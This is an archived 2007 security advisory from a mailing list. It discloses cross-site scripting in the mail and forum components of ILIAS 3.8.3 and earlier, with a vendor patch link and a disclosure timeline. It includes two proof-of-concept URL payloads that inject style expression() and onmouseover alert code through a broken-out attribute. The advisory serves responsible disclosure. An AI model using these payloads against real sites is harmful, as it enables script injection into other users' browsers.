|
|
| Applications |
| Mailing Lists |
| Miscellaneous |
| Operating Systems |
| Programming |
ILIAS <= 3.8.3 Cross Site Scripting
From: L4teral <l4teral(at)gmail.com>
Date: Tue Oct 30 2007 - 17:14:33 EDT
ILIAS <= 3.8.3 Cross Site Scripting
Affected software description:
Vulnerability:
PoC/Exploit:
Solution:
Timeline:
Date: Tue Oct 30 2007 - 17:14:33 EDT
ILIAS <= 3.8.3 Cross Site Scripting
Author: L4teralImpact: Cross Site Scripting Status: patch available
------------------------------
Affected software description:
Application: ILIAS Version: <= 3.8.3 Vendor: http://www.ilias.de
Description:
ILIAS is a powerful web-based learning management system that allows
you to easily manage learning resources in an integrated system.
Vulnerability:
The mailing and forum components are vulnerable to cross site scripting.
PoC/Exploit:
create forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com
http://www.ex"onmouseover="javascript:alert('xss');"ample.com
Solution:
install security patch:
http://www.ilias.de/docu/goto.php?target=pg_16836_35&client_id=docu
Timeline:
17.10.2007 - vendor informed 25.10.2007 - vendor responded 29.10.2007 - vendor released patch 30.10.2007 - public disclosureReceived on Tue Oct 30 17:27:24 2007
This archive was generated by hypermail 2.1.8 : Wed Jul 16 2008 - 14:09:11 EDT
|
Contact Us Legal Notices Order Services Online Pantek Home Privacy Policy IT news Site Map Pantek Library |